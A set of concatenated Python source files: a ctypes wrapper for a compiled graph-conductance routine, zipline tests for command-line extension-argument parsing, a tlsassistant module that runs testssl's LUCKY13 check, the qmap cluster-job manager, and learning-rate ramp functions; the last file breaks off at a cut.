    The argument order matches the call in ``MQI_cpp``:
    (n, nR, ai, aj, offset, R, ret_set).
    """
    # standard_types maps the dtype name strings to numpy + ctypes types.
    float_type,vtype,itype,ctypes_vtype,ctypes_itype,bool_type = standard_types(vtypestr,itypestr)
    fun.restype=ctypes_vtype
    # Array arguments must be C-contiguous numpy buffers of the right dtype.
    fun.argtypes=[ctypes_vtype,ctypes_vtype,
                  ndpointer(ctypes_itype, flags="C_CONTIGUOUS"),
                  ndpointer(ctypes_vtype, flags="C_CONTIGUOUS"),
                  ctypes_vtype,
                  ndpointer(ctypes_vtype, flags="C_CONTIGUOUS"),
                  ndpointer(ctypes_vtype, flags="C_CONTIGUOUS")]
    return fun
# Pre-configured ctypes bindings, one per (vertex dtype, index dtype)
# combination exported by the compiled _graphlib extension.
_graphlib_funs_MQI64 = _setup_MQI_args(
    'int64','int64', _graphlib.MQI64)
_graphlib_funs_MQI32 = _setup_MQI_args(
    'uint32','uint32', _graphlib.MQI32)
_graphlib_funs_MQI32_64 = _setup_MQI_args(
    'uint32','int64', _graphlib.MQI32_64)
def _get_MQI_cpp_types_fun(ai, aj):
    """Resolve dtype information for the CSR arrays and pick the matching
    pre-configured compiled MQI routine.

    Returns the same 6-tuple as before:
    (float_type, vtype, itype, ctypes_vtype, ctypes_itype, fun).
    """
    float_type, vtype, itype, ctypes_vtype, ctypes_itype = determine_types(ai, aj)
    # Dispatch on the (vertex, index) dtype pair; the 32/32 binding is the
    # fallback, exactly as in the original if/elif chain.
    dispatch = {
        (np.int64, np.int64): _graphlib_funs_MQI64,
        (np.uint32, np.int64): _graphlib_funs_MQI32_64,
    }
    fun = dispatch.get((vtype, itype), _graphlib_funs_MQI32)
    return float_type, vtype, itype, ctypes_vtype, ctypes_itype, fun
"""
def MQI_cpp(ai,aj,lib):
float_type,vtype,itype,ctypes_vtype,ctypes_itype = determine_types(ai,aj)
#lib = load_library()
if (vtype, itype) == (np.int64, np.int64):
fun = lib.MQI64
elif (vtype, itype) == (np.uint32, np.int64):
fun = lib.MQI32_64
else:
fun = lib.MQI32
#call C function
fun.restype=ctypes_vtype
fun.argtypes=[ctypes_vtype,ctypes_vtype,
ndpointer(ctypes_itype, flags="C_CONTIGUOUS"),
ndpointer(ctypes_vtype, flags="C_CONTIGUOUS"),
ctypes_vtype,
ndpointer(ctypes_vtype, flags="C_CONTIGUOUS"),
ndpointer(ctypes_vtype, flags="C_CONTIGUOUS")]
return fun
"""
def MQI_cpp(n, ai, aj, nR, R):
    """Run the compiled MQI routine on a CSR graph.

    :param n: number of nodes in the graph
    :param ai, aj: CSR row-pointer and column-index arrays
    :param nR: number of nodes in the seed set
    :param R: seed set (iterable of node ids)
    :return: (actual_length, actual_set) — size and node ids of the
             lowest-conductance subset of R found by MQI
    """
    float_type, vtype, itype, ctypes_vtype, ctypes_itype, fun = _get_MQI_cpp_types_fun(ai, aj)
    R = np.array(R, dtype=vtype)
    ret_set = np.zeros(nR, dtype=vtype)
    # 5th argument is kept at 0 as in the original call; presumably an
    # offset/flag expected by the C signature — TODO confirm against graphlib.
    actual_length = fun(n, nR, ai, aj, 0, R, ret_set)
    # Vectorized copy of the first `actual_length` entries (replaces the
    # element-by-element Python list copy). The trailing extraction junk that
    # was fused onto the original return line is also removed.
    actual_set = ret_set[:actual_length].copy()
    return (actual_length, actual_set)
91a2481625a634c933cabb5f09c844aa355b33bc | 4,226 | py | Python | tests/test_cmdline.py | welly87/zipline | dbdfa8ed86417f954e95bd7468e144589f2cd482 | [
"Apache-2.0"
] | 38 | 2019-08-15T18:11:21.000Z | 2021-09-25T17:17:31.000Z | tests/test_cmdline.py | welly87/zipline | dbdfa8ed86417f954e95bd7468e144589f2cd482 | [
"Apache-2.0"
] | 4 | 2018-11-02T07:31:31.000Z | 2018-11-05T09:08:17.000Z | tests/test_cmdline.py | welly87/zipline | dbdfa8ed86417f954e95bd7468e144589f2cd482 | [
"Apache-2.0"
] | 15 | 2019-08-14T00:14:17.000Z | 2022-01-20T03:15:25.000Z | import zipline.__main__ as main
import zipline
from zipline.testing import ZiplineTestCase
from zipline.testing.predicates import (
assert_equal,
assert_raises_str,
)
from click.testing import CliRunner
from zipline.extensions import (
Namespace,
create_args,
parse_extension_arg,
)
class CmdLineTestCase(ZiplineTestCase):
    """Tests for zipline's `-x key=value` extension-argument parsing."""

    def init_instance_fixtures(self):
        super(CmdLineTestCase, self).init_instance_fixtures()

    def test_parse_args(self):
        """Valid key=value pairs populate the dict/Namespace; malformed ones raise."""
        n = Namespace()
        arg_dict = {}
        arg_list = [
            'key=value',
            'arg1=test1',
            'arg2=test2',
            'arg_3=test3',
            '_arg_4_=test4',
        ]
        for arg in arg_list:
            parse_extension_arg(arg, arg_dict)
        assert_equal(
            arg_dict,
            {
                '_arg_4_': 'test4',
                'arg_3': 'test3',
                'arg2': 'test2',
                'arg1': 'test1',
                'key': 'value',
            }
        )
        create_args(arg_list, n)
        assert_equal(n.key, 'value')
        assert_equal(n.arg1, 'test1')
        assert_equal(n.arg2, 'test2')
        assert_equal(n.arg_3, 'test3')
        assert_equal(n._arg_4_, 'test4')
        # Keys must be valid identifiers: no leading digit, spaces, or dots
        # with non-identifier components.
        msg = (
            "invalid extension argument '1=test3', "
            "must be in key=value form"
        )
        with assert_raises_str(ValueError, msg):
            parse_extension_arg('1=test3', {})
        msg = (
            "invalid extension argument 'arg4 test4', "
            "must be in key=value form"
        )
        with assert_raises_str(ValueError, msg):
            parse_extension_arg('arg4 test4', {})
        msg = (
            "invalid extension argument 'arg5.1=test5', "
            "must be in key=value form"
        )
        with assert_raises_str(ValueError, msg):
            parse_extension_arg('arg5.1=test5', {})
        msg = (
            "invalid extension argument 'arg6.6arg=test6', "
            "must be in key=value form"
        )
        with assert_raises_str(ValueError, msg):
            parse_extension_arg('arg6.6arg=test6', {})
        msg = (
            "invalid extension argument 'arg7.-arg7=test7', "
            "must be in key=value form"
        )
        with assert_raises_str(ValueError, msg):
            parse_extension_arg('arg7.-arg7=test7', {})

    def test_parse_namespaces(self):
        """Dotted keys build nested namespaces; a key cannot be both a leaf and a namespace."""
        n = Namespace()
        create_args(
            [
                "first.second.a=blah1",
                "first.second.b=blah2",
                "first.third=blah3",
                "second.a=blah4",
                "second.b=blah5",
            ],
            n
        )
        assert_equal(n.first.second.a, 'blah1')
        assert_equal(n.first.second.b, 'blah2')
        assert_equal(n.first.third, 'blah3')
        assert_equal(n.second.a, 'blah4')
        assert_equal(n.second.b, 'blah5')
        n = Namespace()
        msg = "Conflicting assignments at namespace level 'second'"
        with assert_raises_str(ValueError, msg):
            create_args(
                [
                    "first.second.a=blah1",
                    "first.second.b=blah2",
                    "first.second=blah3",
                ],
                n
            )

    def test_user_input(self):
        """End-to-end: `-x` options on the CLI land in zipline.extension_args."""
        zipline.extension_args = Namespace()
        runner = CliRunner()
        result = runner.invoke(main.main, [
            '-xfirst.second.a=blah1',
            '-xfirst.second.b=blah2',
            '-xfirst.third=blah3',
            '-xsecond.a.b=blah4',
            '-xsecond.b.a=blah5',
            '-xa1=value1',
            '-xb_=value2',
            'bundles',
        ])
        assert_equal(result.exit_code, 0)  # assert successful invocation
        assert_equal(zipline.extension_args.first.second.a, 'blah1')
        assert_equal(zipline.extension_args.first.second.b, 'blah2')
        assert_equal(zipline.extension_args.first.third, 'blah3')
        assert_equal(zipline.extension_args.second.a.b, 'blah4')
        assert_equal(zipline.extension_args.second.b.a, 'blah5')
        assert_equal(zipline.extension_args.a1, 'value1')
        assert_equal(zipline.extension_args.b_, 'value2')
| 30.402878 | 73 | 0.539991 |
7862a171b1e3b1fecc3a7ec0fe5c12d7ae659c0a | 720 | py | Python | modules/server/lucky13.py | turbostar190/tlsassistant | a3f2032cf2d1ab407c210af7069b1faef3b0a928 | [
"Apache-2.0"
] | 18 | 2019-06-13T09:19:07.000Z | 2022-03-11T07:24:50.000Z | modules/server/lucky13.py | turbostar190/tlsassistant | a3f2032cf2d1ab407c210af7069b1faef3b0a928 | [
"Apache-2.0"
] | 2 | 2019-07-25T07:10:43.000Z | 2021-07-28T12:34:38.000Z | modules/server/lucky13.py | turbostar190/tlsassistant | a3f2032cf2d1ab407c210af7069b1faef3b0a928 | [
"Apache-2.0"
] | 10 | 2019-06-21T09:29:06.000Z | 2022-03-18T07:45:52.000Z | from modules.server.testssl_base import Testssl_base
from modules.stix.stix_base import Bundled
from utils.mitigations import load_mitigation
class Lucky13(Testssl_base):
"""
Analysis of the lucky13 testssl results
"""
stix = Bundled(mitigation_object=load_mitigation("LUCKY13"))
# to override
def _set_arguments(self):
"""
Sets the arguments for the testssl command
"""
self._arguments = ["-L"]
# to override
def _worker(self, results):
"""
The worker method, which runs the testssl command
:param results: dict
:return: dict
:rtype: dict
"""
return self._obtain_results(results, ["LUCKY13"])
| 24 | 64 | 0.640278 |
a007827a7ad67827fcd1d1cc88bcc1bd2dbfddd1 | 16,033 | py | Python | qmap/manager.py | bbglab/qmap | c73c355b73995a839fc1923a3f57d3a933721bfd | [
"Apache-2.0"
] | null | null | null | qmap/manager.py | bbglab/qmap | c73c355b73995a839fc1923a3f57d3a933721bfd | [
"Apache-2.0"
] | null | null | null | qmap/manager.py | bbglab/qmap | c73c355b73995a839fc1923a3f57d3a933721bfd | [
"Apache-2.0"
] | null | null | null | """
This module contains the manager for the execution of the jobs.
The manager is in charge of providing an interface that
is used to manage the jobs and interact with them.
An execution is a set of jobs that are lunched together.
The manager should be able to handle several jobs together
(e.g. cancelling multiple jobs at once).
Additionally, one of the key features of the is
that it should be able to
keep the number of jobs that has been submitted
below certain threshold to avoid gathering all the resources
of the cluster.
"""
import os
import logging
from collections import OrderedDict
from os import path
from weakref import WeakMethod
from qmap import executor
from qmap.globals import QMapError, EXECUTION_ENV_FILE_NAME, EXECUTION_METADATA_FILE_NAME
from qmap.job import SubmittedJob, ReattachedJob, JobStatus
from qmap.job.status import VALUES as JOB_STATUS_VALUES
from qmap.profile import Profile
from qmap.file import metadata as metadata_file, env as env_file, jobs as jobs_file
logger = logging.getLogger("qmap")
class Status:

    def __init__(self, jobs):
        """
        Information about the status of the jobs in the execution.

        Args:
            jobs (dict): map of job ID -> job (see :obj:`~qmap.job.job.Job`)

        Job IDs are grouped in lists by status (see :obj:`~qmap.job.status.Status`).
        Lists (rather than sets) keep track of the order in which jobs enter
        each state so they can be moved between groups deterministically.
        """
        self._jobs = jobs
        self.total = len(self._jobs)
        self.groups = {}  # Groups of job IDs, keyed by status value
        self._info_string = ''  # e.g. "Run: {} Pending: {} ... TOTAL: {}"
        for g in JOB_STATUS_VALUES:
            self.groups[g] = list()
            self._info_string += '{}: {{}} '.format(g.title())
        self._info_string += 'TOTAL: {}'
        self._build_groups()

    def _build_groups(self):
        """Assign every job to its status group and register a weak-ref
        callback so the job notifies this object on state changes.
        WeakMethod avoids keeping this Status alive through the job."""
        for id_, job in self._jobs.items():
            self.groups[job.status].append(id_)
            job.state_change_handlers.append(WeakMethod(self.notify_state_change))

    def update(self):
        """
        Update the status of the jobs using the cluster interface
        (multiple jobs queried at once).
        Only jobs with status RUN, PENDING and OTHER are updated; terminal
        states cannot change.
        """
        for status in [JobStatus.RUN, JobStatus.PENDING, JobStatus.OTHER]:
            ids_to_update = self.groups[status]
            # Index by executor ID because that is what the scheduler reports.
            jobs_to_update = {self._jobs[id_].executor_id: self._jobs[id_] for id_ in ids_to_update}
            if len(jobs_to_update) > 0:
                for job_id, status_ in executor.generate_jobs_status(jobs_to_update.keys()):
                    jobs_to_update[job_id].change_status(*status_)

    def notify_state_change(self, job_id, old_status, new_status):
        """
        Move a job ID from one status group to another.

        Args:
            job_id (str): identifier of the job
            old_status (str): previous job status
            new_status (str): current job status
        """
        if old_status == new_status:
            return
        else:
            self.groups[old_status].remove(job_id)
            self.groups[new_status].append(job_id)

    def __repr__(self):
        """Build a string with the amount of jobs in each group and the total."""
        values = []
        for g in JOB_STATUS_VALUES:
            values.append(len(self.groups[g]))
        values.append(self.total)
        return self._info_string.format(*values)
class Manager:
    """Interface for an execution: a set of jobs launched together.

    Keeps at most ``max_running`` jobs submitted to the cluster at once and
    persists its state as metadata + env files inside ``out_folder``.
    """

    # Keys used in the execution metadata file.
    MD_PROFILE = 'profile'
    MD_MAX_RUNNING = 'running'
    MD_GROUP_SIZE = 'groups'

    def __init__(self, output_folder):
        """
        The manager is the interface for the execution.

        Args:
            output_folder (str): path to the folder where to store job data
        """
        self.out_folder = output_folder
        self._f_metadata = path.join(self.out_folder, EXECUTION_METADATA_FILE_NAME)
        self._f_env = path.join(self.out_folder, EXECUTION_ENV_FILE_NAME)
        self._jobs = {}
        self.max_running = None  # Max running jobs at the same time (running is the sum of pending+running)
        self.is_submission_enabled = True  # Flag that indicates if the submission of new jobs is enabled or not
        self._group_size = None  # Size of the groups made
        self._profile = None  # Executor profile
        self.status = None

    def _save_metadata(self):
        """Persist the execution metadata. The only variable member is
        max_running, so saving at creation and close time is enough."""
        metadata = {Manager.MD_PROFILE: dict(self._profile), Manager.MD_MAX_RUNNING: self.max_running,
                    Manager.MD_GROUP_SIZE: self._group_size}
        metadata_file.save(self._f_metadata, metadata)

    def _save_environment(self):
        """Create and store the env file from the job parameters of the profile."""
        env_file.save(self._f_env, self._profile.parameters)

    def get(self, id_):
        """Get a particular job by ID, or None if unknown."""
        return self._jobs.get(id_, None)

    def get_jobs(self, status=None):
        """
        Args:
            status (str, default None): see :obj:`~qmap.job.status.Status`

        Returns:
            list. Job IDs of the selected status group.
            If status is None, all job IDs are returned.
        """
        if status is None:
            return self._jobs.keys()
        else:
            return self.status.groups.get(status, None)

    def close(self):
        """
        Save metadata of all jobs and of the manager itself.
        To be called before shutting down the manager.

        Raises:
            QMapError: if any job metadata cannot be saved (all jobs are
            still attempted before raising).
        """
        errors = []
        for id_, job in self._jobs.items():
            try:
                job.save_metadata()
            except QMapError:
                errors.append(id_)
                continue
        if len(errors) > 0:
            raise QMapError('Error saving metadata of {}'.format(', '.join(errors)))
        self._save_metadata()  # The max running jobs might have changed

    def submit_and_close(self):
        """Submit all UNSUBMITTED jobs for execution and call :meth:`close`."""
        self.max_running = len(self._jobs)  # lift the cap so everything submits
        self.update()
        self.close()

    def terminate(self):
        """
        Cancel all jobs whose status is RUN, PENDING or OTHER
        and stop the submission of new ones.
        """
        job_ids = [self._jobs[id].executor_id for id in self.status.groups[JobStatus.RUN]]
        job_ids += [self._jobs[id].executor_id for id in self.status.groups[JobStatus.PENDING]]
        job_ids += [self._jobs[id].executor_id for id in self.status.groups[JobStatus.OTHER]]
        executor.terminate_jobs(job_ids)
        self.is_submission_enabled = False

    def resubmit_failed(self, **kwargs):
        """
        Resubmit all jobs that have FAILED.

        Raises:
            QMapError: when any job cannot be resubmitted.
        """
        errors = []
        ids_to_resubmit = self.status.groups[JobStatus.FAILED][:]  # make a copy because the list is going to be altered
        for id_ in ids_to_resubmit:
            try:
                self._jobs[id_].resubmit(**kwargs)
            except QMapError:
                errors.append(id_)
                continue
        if len(errors) > 0:
            raise QMapError('Error resubmitting {}'.format(', '.join(errors)))

    def update(self):
        """
        Update the status of the execution and submit UNSUBMITTED jobs
        for execution if the number of RUN and PENDING jobs is lower than
        the configured maximum.

        The submission of new jobs can be stopped/started using the
        :meth:`terminate` method and the :obj:`is_submission_enabled` flag.
        """
        self.status.update()
        unsubmitted_jobs = self.get_jobs(JobStatus.UNSUBMITTED)
        if len(unsubmitted_jobs) > 0 and self.is_submission_enabled:
            # Submit new jobs up to the max_running cap
            running_and_pending = len(self.get_jobs(JobStatus.RUN)) + len(self.get_jobs(JobStatus.PENDING))
            to_run = self.max_running - running_and_pending
            if to_run > 0:
                ids_to_run = unsubmitted_jobs[:to_run]  # make a copy because the list is going to be altered
                errors = []
                for id_ in ids_to_run:
                    try:
                        job = self._jobs[id_]
                        job.run(self.job_params)  # job can change the params object
                    except QMapError:
                        errors.append(id_)
                        continue
                if len(errors) > 0:
                    raise QMapError('Error running {}'.format(', '.join(errors)))

    def update_job_params(self, **kwargs):
        """Update default job parameters (does not affect specific job parameters)."""
        self._profile.parameters.update(**kwargs)
        self._save_environment()

    @property
    def is_done(self):
        """Check whether all jobs are COMPLETED or FAILED."""
        completed = len(self.get_jobs(JobStatus.DONE))
        failed = len(self.get_jobs(JobStatus.FAILED))
        return completed + failed == len(self._jobs)

    @property
    def job_params(self):
        """Get default parameters for a job (as a copy, so callers may mutate)."""
        return self._profile.parameters.copy()

    @property
    def editable_job_params(self):
        """List the parameters that are editable; falls back to all parameter names."""
        return self._profile.get('editable_params',
                                 OrderedDict([(k, k.title()) for k in self._profile.parameters.keys()]))
class Submitted(Manager):
    """Execution created from a jobs file (fresh submission)."""

    def __init__(self, input_file, output_folder, profile_conf, max_running_jobs=None, group_size=None, cli_params=None):
        """
        Use a jobs file to create a set of jobs for submission.

        Args:
            input_file (str): path to file with the commands (see :func:`~qmap.file.jobs`).
            output_folder (str): path where to save the job related files. It must be empty.
            profile_conf (:class:`~qmap.profile.Profile`): profile configuration
            max_running_jobs (int): maximum jobs that can be submitted to the cluster at once.
               Defaults to all.
            group_size (int): number of commands to group under the same job
            cli_params (:class:`~qmap.parameters.Parameters`): configuration for the jobs received from command line

        The input file is copied to the output_folder (and renamed).
        """
        super().__init__(output_folder)
        try:
            os.makedirs(self.out_folder)
        except OSError:
            # Folder already exists: only acceptable when it is empty.
            if os.listdir(self.out_folder):  # directory not empty
                raise QMapError('Output folder [{}] is not empty. '
                                'Please give a different folder to write the output files.'.format(self.out_folder))
        self._profile = profile_conf
        self._group_size = group_size
        self.__load_input(input_file, cli_params)
        self.max_running = len(self._jobs) if max_running_jobs is None else max_running_jobs
        self._save_metadata()
        self._save_environment()
        self.status = Status(self._jobs)
        self.update()  # kick off the first batch of submissions

    def __load_input(self, in_file, cli_params=None):
        """Parse the jobs file and build the job objects (grouped or not).

        Parameter precedence (later overrides earlier):
        profile defaults < file-level params < command-line params.
        """
        pre, job, post, general_parameters = jobs_file.parse(in_file)
        # Refuse huge ungrouped submissions when the profile sets a limit.
        if len(job) > int(self._profile.get('max_ungrouped', len(job)+1)) and self._group_size is None:
            raise QMapError('To submit more than {} jobs, please specify the group parameter.'
                            'This parameter indicate the size of each group.'
                            'For small jobs, the bigger the group the better.'
                            'Please, note that the job specific _params will be ignored'.format(self._profile['max_ungrouped']))
        job_parameters = self._profile.parameters  # default _params
        job_parameters.update(general_parameters)  # global input file _params
        if cli_params is not None:
            job_parameters.update(cli_params)  # execution command line _params
        job_list = []
        if self._group_size is None or self._group_size == 1:
            # One job per command; '##' separates a command from its inline params.
            for i, c in job.items():
                cmd = c.split('##')
                params = None
                if len(cmd) > 1:  # if the job has specific _params
                    params = jobs_file.parse_inline_parameters(cmd[1])  # job specific _params
                job_list.append((i, SubmittedJob(i, self.out_folder, cmd[0].strip(), params, pre_commands=pre, post_commands=post)))
        else:
            # Grouped mode: bundle group_size commands per job; inline params
            # cannot be honoured per-command and are dropped.
            logger.warning("Specific job execution _params ignored")
            cmds_in_group = []
            group_name = None  # group takes the ID of its first command
            cmds_counter = 0
            for i, c in job.items():
                if group_name is None:
                    group_name = i
                command = c.split('##')[0].strip()
                cmds_in_group.append(command)
                cmds_counter += 1
                if cmds_counter >= self._group_size:
                    job_list.append((group_name, SubmittedJob(group_name, self.out_folder, cmds_in_group, None, pre_commands=pre, post_commands=post)))
                    group_name = None
                    cmds_in_group = []
                    cmds_counter = 0
            else:
                # for-else: after the loop, flush a possibly incomplete last group.
                if len(cmds_in_group) > 0:  # in case there is a remaining group
                    job_list.append((group_name, SubmittedJob(group_name, self.out_folder, cmds_in_group, None, pre_commands=pre, post_commands=post)))
        self._jobs = OrderedDict(job_list)
        jobs_file.save(in_file, self.out_folder)
class Reattached(Manager):
    """Execution re-created from an existing output folder."""

    def __init__(self, output_folder, force=False, max_running_jobs=None):
        """
        Creates an execution from an existing output folder.

        Args:
            output_folder (str): path to a previous execution output folder
            force (bool): try to load as many jobs as possible regardless of loading errors
            max_running_jobs (int): maximum jobs that can be submitted to the cluster at once.

        Each job is identified by its metadata file.
        If no jobs can be loaded a QMapError is raised.
        """
        super().__init__(output_folder)
        # Load metadata
        metadata = metadata_file.load(self._f_metadata)
        profile_conf = metadata[Manager.MD_PROFILE]
        profile_conf['params'] = env_file.load(self._f_env)
        self._profile = Profile(profile_conf)
        self.max_running = metadata[Manager.MD_MAX_RUNNING] if max_running_jobs is None else max_running_jobs
        self._group_size = metadata.get(Manager.MD_GROUP_SIZE, None)
        # Load jobs
        self._jobs = OrderedDict()
        try:
            self.__load_execution()
        except QMapError as e:
            if force:
                logger.warning(e)  # keep whatever loaded successfully
            else:
                raise e
        self.status = Status(self._jobs)
        if len(self._jobs) == 0:
            raise QMapError('No jobs found in folder {}'.format(output_folder))
        self.is_submission_enabled = False  # reattached executions never submit new jobs
        self.update()

    def __load_execution(self):
        """Recreate job objects from every per-job metadata file in the folder."""
        ids = []
        for file in metadata_file.find(self.out_folder):
            file_name = path.splitext(path.basename(file))[0]
            # Skip the execution-level metadata file itself.
            if not file_name == EXECUTION_METADATA_FILE_NAME:
                ids.append(file_name)
        corrupt_jobs = []
        for id_ in sorted(ids):
            try:
                self._jobs[id_] = ReattachedJob(id_, self.out_folder)
            except QMapError:
                corrupt_jobs.append(id_)
                continue
        if len(corrupt_jobs) > 0:
            raise QMapError('Error loading the following jobs: {}'.format(', '.join(corrupt_jobs)))
| 37.992891 | 151 | 0.617476 |
1844cce18cc5af0272da44a6773a538ea98b2217 | 3,169 | py | Python | music_cog.py | IzzatCORP/IzzatYellowMusic | 7f7dbf3ed0fe6de003a9f53df992192cb9b29438 | [
"MIT"
] | null | null | null | music_cog.py | IzzatCORP/IzzatYellowMusic | 7f7dbf3ed0fe6de003a9f53df992192cb9b29438 | [
"MIT"
] | null | null | null | music_cog.py | IzzatCORP/IzzatYellowMusic | 7f7dbf3ed0fe6de003a9f53df992192cb9b29438 | [
"MIT"
] | null | null | null | import nextcord
from nextcord.ext import commands
from youtube_dl import YoutubeDL
class music_cog(commands.Cog):
    """Music playback cog: keeps a FIFO queue of YouTube tracks and streams
    them into the requesting user's voice channel via FFmpeg."""

    def __init__(self, bot):
        self.bot = bot
        self.is_playing = False
        # Each entry is [song_dict, voice_channel]; song_dict has 'source'/'title'.
        self.music_queue = []
        self.YDL_OPTIONS = {'format': 'bestaudio', 'noplaylist':'True'}
        self.FFMPEG_OPTIONS = {'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'}
        self.vc = ""  # current VoiceClient; "" sentinel means "not connected yet"

    def search_yt(self, item):
        """Resolve a search term to a {'source','title'} dict, or False on failure."""
        with YoutubeDL(self.YDL_OPTIONS) as ydl:
            try:
                info = ydl.extract_info("ytsearch:%s" % item, download=False)['entries'][0]
            except Exception:
                return False
        return {'source': info['formats'][0]['url'], 'title': info['title']}

    def play_next(self):
        """After-playback callback: start the next queued track, if any."""
        if len(self.music_queue) > 0:
            self.is_playing = True
            m_url = self.music_queue[0][0]['source']
            self.music_queue.pop(0)
            self.vc.play(nextcord.FFmpegPCMAudio(m_url, **self.FFMPEG_OPTIONS), after=lambda e: self.play_next())
        else:
            self.is_playing = False

    async def play_music(self):
        """Connect (or move) to the queued channel and play the first queued track."""
        if len(self.music_queue) > 0:
            self.is_playing = True
            m_url = self.music_queue[0][0]['source']
            # BUGFIX: condition was `not not self.vc.is_connected()`, which made
            # the bot reconnect while already connected and never move channels.
            if self.vc == "" or not self.vc.is_connected():
                self.vc = await self.music_queue[0][1].connect()
            else:
                # BUGFIX: move_to() belongs to the VoiceClient (the old code
                # called it on the bot) and returns None, so do not overwrite
                # self.vc with its result.
                await self.vc.move_to(self.music_queue[0][1])
            self.music_queue.pop(0)  # leftover debug print removed
            self.vc.play(nextcord.FFmpegPCMAudio(m_url, **self.FFMPEG_OPTIONS), after=lambda e: self.play_next())
        else:
            self.is_playing = False

    @commands.command()
    async def play(self, ctx, *args):
        """Search YouTube for the given query and queue the first result."""
        query = " ".join(args)
        # BUGFIX: check ctx.author.voice before dereferencing .channel —
        # previously a user outside voice crashed with AttributeError.
        if ctx.author.voice is None:
            await ctx.send("Connect to voice channel lol")
        else:
            voice_channel = ctx.author.voice.channel
            song = self.search_yt(query)
            if isinstance(song, bool):  # search_yt returns False on failure
                await ctx.send("Could not download this song, so Incorrect format try another keyword idiot. This could be due to playlist or Live")
            else:
                await ctx.send("Added to Song Queue , nice")
                self.music_queue.append([song, voice_channel])
                if self.is_playing == False:
                    await self.play_music()

    @commands.command()
    async def queue(self, ctx):
        """Show the titles currently waiting in the queue."""
        retval = ""
        for entry in self.music_queue:
            retval += entry[0]['title'] + "\n"
        if retval != "":
            await ctx.send(retval)
        else:
            await ctx.send("No music found in queue")

    @commands.command()
    async def skip(self, ctx):
        """Stop the current track and start the next one."""
        if self.vc != "":
            self.vc.stop()
            # NOTE(review): vc.stop() may already trigger the `after` callback
            # (play_next), making this explicit call redundant — confirm
            # against nextcord's VoiceClient semantics before removing.
            await self.play_music()

    @commands.command()
    async def disconnect(self, ctx):
        """Leave the voice channel."""
        await self.vc.disconnect()
0e768228677cc5960634748c37cbdd15b69712e8 | 295 | py | Python | RecoTauTag/HLTProducers/python/TauDQM_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | RecoTauTag/HLTProducers/python/TauDQM_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | RecoTauTag/HLTProducers/python/TauDQM_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
# CMSSW DQM producer configuration for HLT tau monitoring.
TauDQM = cms.EDProducer("DQMTauProducer",
    # Input: track-isolated tau jets from the HLT L2.5 cone-isolation step.
    TrackIsoJets = cms.InputTag("hltL25TauConeIsolation"),
    # Cone sizes — presumably deltaR values for the signal/matching/isolation
    # cones, and a minimum track pT in GeV; confirm against DQMTauProducer.
    SignalCone = cms.double(0.15),
    MatchingCone = cms.double(0.2),
    IsolationCone = cms.double(0.5),
    MinPtTracks = cms.double(1.)
)
| 29.5 | 58 | 0.688136 |
bfa278bb59d1549e6ccf357b506f6805ce53f6f9 | 381 | py | Python | edge/store_voltage.py | dannil10/dogger | 7e4570f1aa7d5393a9ae182498573d03fe1b61e9 | [
"MIT"
] | null | null | null | edge/store_voltage.py | dannil10/dogger | 7e4570f1aa7d5393a9ae182498573d03fe1b61e9 | [
"MIT"
] | null | null | null | edge/store_voltage.py | dannil10/dogger | 7e4570f1aa7d5393a9ae182498573d03fe1b61e9 | [
"MIT"
] | null | null | null | import gateway.queue
# Queue that buffers readings from 32 voltage channels into local NumPy files.
numpy_sql = gateway.queue.NumpyFile(
    channels = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32},
    start_delay = 0,
    file_path = '/home/heta/Z/data/files/voltage/',
    files_to_keep = 0,  # 0 presumably means "keep everything" — confirm in gateway.queue
    config_filepath = '/home/heta/Z/app/python/dogger/',
    config_filename = 'conf.ini')
# Blocking entry point: starts the acquisition/storage loop.
numpy_sql.run()
| 29.307692 | 105 | 0.64042 |
6185266ecebd460d6d802beff43d35f3182979e4 | 3,021 | py | Python | ramps.py | Stomach-ache/MixPUL | 96ecbbdcae4fbfc57e77fdaf62b197e6b81657c0 | [
"MIT"
] | 4 | 2019-09-17T08:48:09.000Z | 2022-03-19T01:57:29.000Z | ramps.py | Stomach-ache/MixPUL | 96ecbbdcae4fbfc57e77fdaf62b197e6b81657c0 | [
"MIT"
] | 1 | 2019-09-17T08:48:55.000Z | 2019-09-17T08:48:55.000Z | ramps.py | Stomach-ache/MixPUL | 96ecbbdcae4fbfc57e77fdaf62b197e6b81657c0 | [
"MIT"
] | null | null | null | # Copyright (c) 2018, Curious AI Ltd. All rights reserved.
#
# This work is licensed under the Creative Commons Attribution-NonCommercial
# 4.0 International License. To view a copy of this license, visit
# http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to
# Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.
"""Functions for ramping hyperparameters up or down
Each function takes the current training step or epoch, and the
ramp length in the same format, and returns a multiplier between
0 and 1.
"""
import numpy as np
def sigmoid_rampup(current, rampup_length):
    """Exponential (sigmoid-shaped) rampup from https://arxiv.org/abs/1610.02242.

    Returns a multiplier in (0, 1] that approaches 1 as `current` approaches
    `rampup_length`; a zero-length ramp is always 1.0.
    """
    if rampup_length == 0:
        return 1.0
    clipped = np.clip(current, 0.0, rampup_length)
    remaining = 1.0 - clipped / rampup_length
    return float(np.exp(-5.0 * remaining * remaining))
def linear_rampup(current, rampup_length):
    """Linear rampup: grows from 0 to 1 over `rampup_length` steps, then
    stays at 1. Both arguments must be non-negative."""
    assert current >= 0 and rampup_length >= 0
    if current < rampup_length:
        return current / rampup_length
    return 1.0
def cosine_rampdown(current, rampdown_length):
    """Half-cosine rampdown from https://arxiv.org/abs/1608.03983: decays
    smoothly from 1 (at current=0) to 0 (at current=rampdown_length)."""
    assert 0 <= current <= rampdown_length
    cosine = np.cos(np.pi * current / rampdown_length)
    return float(0.5 * (cosine + 1))
if __name__ == '__main__':
    # Demo script: plot an example learning-rate schedule built from the
    # ramp functions above.
    import numpy as np
